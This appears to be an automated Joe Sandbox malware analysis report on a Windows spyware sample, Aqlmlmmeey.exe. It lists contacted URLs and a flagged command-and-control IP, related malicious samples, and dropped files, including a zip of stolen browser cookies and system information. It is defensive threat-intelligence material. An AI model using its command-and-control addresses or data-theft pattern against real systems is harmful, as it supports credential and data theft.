http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852	Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	qipcap.dll.0.dr	false		high
http://www.certplus.com/CRL/class2.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.quovadisglobal.com/cps0	nssckbi.dll.0.dr	false		high
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0rs	Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0	nssckbi.dll.0.dr	false		high
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0usp	Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	false		high
https://ocsp.quovadisoffshore.com0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://cps.chambersign.org/cps/chambersignroot.html0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.sqlite.org/copyright.html.	sqlite3.dll.0.dr	false		high
http://policy.camerfirma.com0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RYwTiizs2t.0.dr	false		high
http://185.138.164.150/M	Aqlmlmmeey.exe, 00000000.00000002.272808697.00000000054BC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0o	Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	false		high
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0pC	Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	false		high
http://185.138.164.150:80/779676D92903688rome	Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.accv.es/legislacion_c.htm0U	nssckbi.dll.0.dr	false		high
http://www.certicamara.com/dpc/0Z	nssckbi.dll.0.dr	false		high
http://ocsp.accv.es0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://ocsp.thawte.com0	qipcap.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0usp	Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RYwTiizs2t.0.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	RYwTiizs2t.0.dr	false		high
http://185.138.164.150//l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aae7w	Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	RYwTiizs2t.0.dr	false		high
https://www.google.com/chrome/static	Aqlmlmmeey.exe, 00000000.00000003.269713467.00000000054BC000.00000004.00000001.sdmp	false		high
https://www.catcert.net/verarrel	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	nssckbi.dll.0.dr	false		high
http://crl.chambersign.org/chambersignroot.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://crl.xrampsecurity.com/XGCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1	Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	false		high
https://www.catcert.net/verarrel05	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.quovadis.bm0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.accv.es00	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.pkioverheid.nl/policies/root-policy-G20	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.cert.fnmt.es/dpcs/0	nssckbi.dll.0.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RYwTiizs2t.0.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RYwTiizs2t.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.138.164.150	unknown	Germany		50451	DEPTELECOMNSO-ASRU	true
149.154.167.99	t.me	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491928
Start date:	28.09.2021
Start time:	07:37:28
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Aqlmlmmeey.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/67@1/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 102 Number of non-executed functions: 9
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 204.79.197.200, 13.107.21.200, 20.82.210.154, 40.112.88.60, 80.67.82.211, 80.67.82.235 Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:38:31	API Interceptor	5x Sleep call for process: Aqlmlmmeey.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.138.164.150	6lGJNtdKHt.exe	Get hash	malicious	Browse	185.138.164.150/
	nGiDZ9ZC2d.exe	Get hash	malicious	Browse	185.138.164.150/
	75fcGkVO1k.exe	Get hash	malicious	Browse	185.138.164.150/
	8aAG42oIjb.exe	Get hash	malicious	Browse	185.138.164.150/
	jUV82t8dgh.exe	Get hash	malicious	Browse	185.138.164.150/
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	185.138.164.150/
149.154.167.99	W6qKnnjMEi	Get hash	malicious	Browse	t.me/jhzljkhbsdklzjdlkzj281679827sjah
149.154.167.99	snfstBXgxa	Get hash	malicious	Browse	t.me/cui8txvnmv

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
t.me	6lGJNtdKHt.exe	Get hash	malicious	Browse	149.154.167.99
	nGiDZ9ZC2d.exe	Get hash	malicious	Browse	149.154.167.99
	xx2wsaL3cJ.exe	Get hash	malicious	Browse	149.154.167.99
	75fcGkVO1k.exe	Get hash	malicious	Browse	149.154.167.99
	8aAG42oIjb.exe	Get hash	malicious	Browse	149.154.167.99
	Zq0u07ZGkg.exe	Get hash	malicious	Browse	149.154.167.99
	jUV82t8dgh.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	149.154.167.99
	31cGYywxgy.exe	Get hash	malicious	Browse	149.154.167.99
	pAWNholT8X.exe	Get hash	malicious	Browse	149.154.167.99
	OARirszNK2.exe	Get hash	malicious	Browse	149.154.167.99
	rbQe356Ces.exe	Get hash	malicious	Browse	149.154.167.99
	kzSWxYLY4H.exe	Get hash	malicious	Browse	149.154.167.99
	nrR5LZJupm.exe	Get hash	malicious	Browse	149.154.167.99
	Neue Bestellung 09001.exe	Get hash	malicious	Browse	149.154.167.99
	DeKxL6OdiV.exe	Get hash	malicious	Browse	149.154.167.99
	OTKqvzSZfm.exe	Get hash	malicious	Browse	149.154.167.99
	u8NGCuPdOR.exe	Get hash	malicious	Browse	149.154.167.99
	e5jVcbuCo5.exe	Get hash	malicious	Browse	149.154.167.99
	i7qUJCnMz0.exe	Get hash	malicious	Browse	149.154.167.99

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	6lGJNtdKHt.exe	Get hash	malicious	Browse	149.154.167.99
	nGiDZ9ZC2d.exe	Get hash	malicious	Browse	149.154.167.99
	xx2wsaL3cJ.exe	Get hash	malicious	Browse	149.154.167.99
	75fcGkVO1k.exe	Get hash	malicious	Browse	149.154.167.99
	8aAG42oIjb.exe	Get hash	malicious	Browse	149.154.167.99
	Zq0u07ZGkg.exe	Get hash	malicious	Browse	149.154.167.99
	jUV82t8dgh.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	149.154.167.99
	31cGYywxgy.exe	Get hash	malicious	Browse	149.154.167.99
	pAWNholT8X.exe	Get hash	malicious	Browse	149.154.167.99
	TT09876545678T8R456.exe	Get hash	malicious	Browse	149.154.167.220
	OARirszNK2.exe	Get hash	malicious	Browse	149.154.167.99
	rbQe356Ces.exe	Get hash	malicious	Browse	149.154.167.99
	01_extracted.exe	Get hash	malicious	Browse	149.154.167.220
	kzSWxYLY4H.exe	Get hash	malicious	Browse	149.154.167.99
	Order_0178PDF.exe	Get hash	malicious	Browse	149.154.167.220
	nrR5LZJupm.exe	Get hash	malicious	Browse	149.154.167.99
	Neue Bestellung 09001.exe	Get hash	malicious	Browse	149.154.167.99
	DeKxL6OdiV.exe	Get hash	malicious	Browse	149.154.167.99
	OTKqvzSZfm.exe	Get hash	malicious	Browse	149.154.167.99
DEPTELECOMNSO-ASRU	6lGJNtdKHt.exe	Get hash	malicious	Browse	185.138.164.150
	nGiDZ9ZC2d.exe	Get hash	malicious	Browse	185.138.164.150
	xx2wsaL3cJ.exe	Get hash	malicious	Browse	185.138.164.150
	75fcGkVO1k.exe	Get hash	malicious	Browse	185.138.164.150
	8aAG42oIjb.exe	Get hash	malicious	Browse	185.138.164.150
	Zq0u07ZGkg.exe	Get hash	malicious	Browse	185.138.164.150
	jUV82t8dgh.exe	Get hash	malicious	Browse	185.138.164.150
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	185.138.164.150
	art185.exe	Get hash	malicious	Browse	185.138.164.157
	art185.exe	Get hash	malicious	Browse	185.138.164.157
	R2u2hrX28Z.exe	Get hash	malicious	Browse	185.138.164.60

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	6lGJNtdKHt.exe	Get hash	malicious	Browse	149.154.167.99
	nGiDZ9ZC2d.exe	Get hash	malicious	Browse	149.154.167.99
	75fcGkVO1k.exe	Get hash	malicious	Browse	149.154.167.99
	8aAG42oIjb.exe	Get hash	malicious	Browse	149.154.167.99
	V-21-Kiel-050-D02.docx	Get hash	malicious	Browse	149.154.167.99
	jUV82t8dgh.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	149.154.167.99
	31cGYywxgy.exe	Get hash	malicious	Browse	149.154.167.99
	pAWNholT8X.exe	Get hash	malicious	Browse	149.154.167.99
	OARirszNK2.exe	Get hash	malicious	Browse	149.154.167.99
	Neue Bestellung 09001.exe	Get hash	malicious	Browse	149.154.167.99
	u8NGCuPdOR.exe	Get hash	malicious	Browse	149.154.167.99
	tNOprA6TKc.exe	Get hash	malicious	Browse	149.154.167.99
	gow3TOp9TW.exe	Get hash	malicious	Browse	149.154.167.99
	TDxZ3sbsqi.exe	Get hash	malicious	Browse	149.154.167.99
	729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exe	Get hash	malicious	Browse	149.154.167.99
	iQjdq8GOib.exe	Get hash	malicious	Browse	149.154.167.99
	aRJ7tjHVOF.exe	Get hash	malicious	Browse	149.154.167.99
	4o99bctKos.exe	Get hash	malicious	Browse	149.154.167.99
	gDvlEg3e8p.exe	Get hash	malicious	Browse	149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\LocalLow\sqlite3.dll	6lGJNtdKHt.exe	Get hash	malicious	Browse
	nGiDZ9ZC2d.exe	Get hash	malicious	Browse
	xx2wsaL3cJ.exe	Get hash	malicious	Browse
	75fcGkVO1k.exe	Get hash	malicious	Browse
	8aAG42oIjb.exe	Get hash	malicious	Browse
	Zq0u07ZGkg.exe	Get hash	malicious	Browse
	jUV82t8dgh.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse
	OARirszNK2.exe	Get hash	malicious	Browse
	rbQe356Ces.exe	Get hash	malicious	Browse
	Neue Bestellung 09001.exe	Get hash	malicious	Browse
	OTKqvzSZfm.exe	Get hash	malicious	Browse
	u8NGCuPdOR.exe	Get hash	malicious	Browse
	e5jVcbuCo5.exe	Get hash	malicious	Browse
	729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exe	Get hash	malicious	Browse
	iQjdq8GOib.exe	Get hash	malicious	Browse
	aRJ7tjHVOF.exe	Get hash	malicious	Browse
	4o99bctKos.exe	Get hash	malicious	Browse
	gDvlEg3e8p.exe	Get hash	malicious	Browse
	oz7Sa3qccH.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\1xVPfvJcrg Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\RYwTiizs2t Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\frAQBc8Wsa Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\rAA74ecQekC.zip Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	1183
Entropy (8bit):	7.504550078014953
Encrypted:	false
SSDEEP:	24:9ss6XB1YPVlMznD4GRWsjLRTzaTBEpg+hm2ag/xFAaLAsnw//l:9Y0VlMzD48WsjLRTGTepscFAKi/t
MD5:	71DFF023B88047201C31080B20B9B283
SHA1:	AC1C9EAB731A5D7E793A9A4E461E723D06D4EBC8
SHA-256:	686EC083E609CD03C3BCBDC9CC5F14CEC0797677C557CC695FEB83A4FAEFF7F2
SHA-512:	8DBFABDC185386E8BBD4502EB3002669F90B902012092953DF1A7FFE8788B36DEA939E565E39CE178B6D7A9CBD9897A42AB24757740CC9362BD752943D1BAE1D
Malicious:	false
Preview:	PK.........=<S..c............browsers/cookies/Google Chrome_Default.txtUT.....Ra..Ra..Ra%.r.0......Q......V.!...H.^Jj..0.V..;.[..2F.?...N..y...<.0..;.y..F/..V.8NvZ._..m;f.{H......].\|.[...R......./...J:I.. I/...Cgv..!.LQ...n......n.SY.B.xSTm2..e_...f)...p..St.C...l..AQe.n..k...PK.........=<Sxou.....;.......System Info.txtUT.....Ra..Ra..RauS.n.0.}....H...%..[....T..R..&V..l.M..;4$.>.!a.............I6.../0..vv.s.....+UJ(D-S....e....)e.......E....E.~`.&.......O....M.k...8.1.&....Q<...$..I...A.$.p...Iv/.G...Z5Z+...A@!.Sm....~...#c..t)..X..^.-...4.._\|.o..{..Gc..VF......6b.>L..Tn.5.Q{yg4..1..e.q@....I..M~8....\|6...b...R....\|w~.._T..m)t.^.B.;...Z.+..i.Ea.n....>...J.......#...0J..,.).....#..6.`a.]..QpLey..}.,.U.....,z..!..._.I.......ZV.c..l.6...b.^...v.8Y....J.....9X.xL_......U.x..xV9.,.?h..*.......D..Q.s..L.Z.%.tVU.'.\V.....>..VR...x..K.e.pJ..M..1[......;..%..}.8.L....KYV(.1..?$Ax ......#q.P..pAQ.?%kj.P...#...vc_...:...SZ:...".... .x.......aR...o...PK....

C:\Users\user\AppData\LocalLow\rQF69AzBla Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.698304057893793
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
MD5:	3806E8153A55C1A2DA0B09461A9C882A
SHA1:	BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
SHA-256:	366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
SHA-512:	31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sqlite3.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	916735
Entropy (8bit):	6.514932604208782
Encrypted:	false
SSDEEP:	24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
MD5:	F964811B68F9F1487C2B41E1AEF576CE
SHA1:	B423959793F14B1416BC3B7051BED58A1034025F
SHA-256:	83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
SHA-512:	565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 6lGJNtdKHt.exe, Detection: malicious, Browse Filename: nGiDZ9ZC2d.exe, Detection: malicious, Browse Filename: xx2wsaL3cJ.exe, Detection: malicious, Browse Filename: 75fcGkVO1k.exe, Detection: malicious, Browse Filename: 8aAG42oIjb.exe, Detection: malicious, Browse Filename: Zq0u07ZGkg.exe, Detection: malicious, Browse Filename: jUV82t8dgh.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, Detection: malicious, Browse Filename: OARirszNK2.exe, Detection: malicious, Browse Filename: rbQe356Ces.exe, Detection: malicious, Browse Filename: Neue Bestellung 09001.exe, Detection: malicious, Browse Filename: OTKqvzSZfm.exe, Detection: malicious, Browse Filename: u8NGCuPdOR.exe, Detection: malicious, Browse Filename: e5jVcbuCo5.exe, Detection: malicious, Browse Filename: 729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exe, Detection: malicious, Browse Filename: iQjdq8GOib.exe, Detection: malicious, Browse Filename: aRJ7tjHVOF.exe, Detection: malicious, Browse Filename: 4o99bctKos.exe, Detection: malicious, Browse Filename: gDvlEg3e8p.exe, Detection: malicious, Browse Filename: oz7Sa3qccH.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...\|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	123344
Entropy (8bit):	6.504957642040826
Encrypted:	false
SSDEEP:	1536:DkO/6RZFrpiS7ewflNGa35iOrjmwWTYP1KxBxZJByEJMBrsuLeLsWxcdaocACs0K:biRZFdBiussQ1MBjq2aocts03/7FE
MD5:	F92586E9CC1F12223B7EEB1A8CD4323C
SHA1:	F5EB4AB2508F27613F4D85D798FA793BB0BD04B0
SHA-256:	A1A2BB03A7CFCEA8944845A8FC12974482F44B44FD20BE73298FFD630F65D8D0
SHA-512:	5C047AB885A8ACCB604E58C1806C82474DC43E1F997B267F90C68A078CB63EE78A93D1496E6DD4F5A72FDF246F40EF19CE5CA0D0296BBCFCFA964E4921E68A2F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y.Z.............x.......x.......x......=z......=z......=z.......x.......x..........z.../{....../{....../{....../{b...../{......Rich............PE..L...C@.\.........."!.................b.......0......................................~p....@.................................p...........h...........................0...T................... ...........@............0..$............................text...7........................... ..`.orpc........ ...................... ..`.rdata...y...0...z..................@..@.data...............................@....rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26064
Entropy (8bit):	5.981632010321345
Encrypted:	false
SSDEEP:	384:KuAjyb0Xc6JzVuLoW2XDOc3TXg1hjsvDG8A3OPLon07zS:BEygs6RV6oW2Xd38njiDG8Mj
MD5:	A7FABF3DCE008915CEE4FFC338FA1CE6
SHA1:	F411FB41181C79FBA0516D5674D07444E98E7C92
SHA-256:	D368EB240106F87188C4F2AE30DB793A2D250D9344F0E0267D4F6A58E68152AD
SHA-512:	3D2935D02D1A2756AAD7060C47DC7CABBA820CC9977957605CE9BBB44222289CBC451AD331F408317CF01A1A4D3CF8D9CFC666C4E6B4DB9DDD404C7629CEAA70
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S......U...U...U...U...U..T...U..T...U..T...U..T...U5.T...U...U!..U..T...U..T...U...U...U..T...URich...U........PE..L...<@.\.........."!.........8......0........0.......................................7....@..........................=......0>..x....`...............H..........<...09..T............................9..@............0...............................text...f........................... ..`.orpc........ ...................... ..`.rdata.......0......................@..@.data...@....P.......(..............@....rsrc........`.......*..............@..@.reloc..<............D..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	70608
Entropy (8bit):	5.389701090881864
Encrypted:	false
SSDEEP:	768:3n8PHF564hn4wva3AVqH5PmE0SjA6QM0avrDG8MR43:38th4wvaQVE5PRl0xs
MD5:	5243F66EF4595D9D8902069EED8777E2
SHA1:	1FB7F82CD5F1376C5378CD88F853727AB1CC439E
SHA-256:	621F38BD19F62C9CE6826D492ECDF710C00BBDCF1FB4E4815883F29F1431DFDA
SHA-512:	A6AB96D73E326C7EEF75560907571AE9CAA70BA9614EB56284B863503AF53C78B991B809C0C8BAE3BCE99142018F59D42DD4BCD41376D0A30D9932BCFCAEE57A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~.....K...K...K.g.K...K4}.J...K4}.J...K4}.J...K4}.J...K...J...K...J...K...K...K&\|.J...K&\|.J...K&\|uK...K&\|.J...KRich...K........PE..L...J@.\.........."!.................$.......0...............................0............@.........................0z.......z...........v................... .......u..T...........................Hv..@............0...............................orpc...t........................... ..`.text........ ...................... ..`.rdata...Q...0...R..................@..@.data................j..............@....rsrc....v.......x...t..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	6.2121285323374185
Encrypted:	false
SSDEEP:	384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
MD5:	7CD244C3FC13C90487127B8D82F0B264
SHA1:	09E1AD17F1BB3D20BD8C1F62A10569F19E838834
SHA-256:	BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
SHA-512:	C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
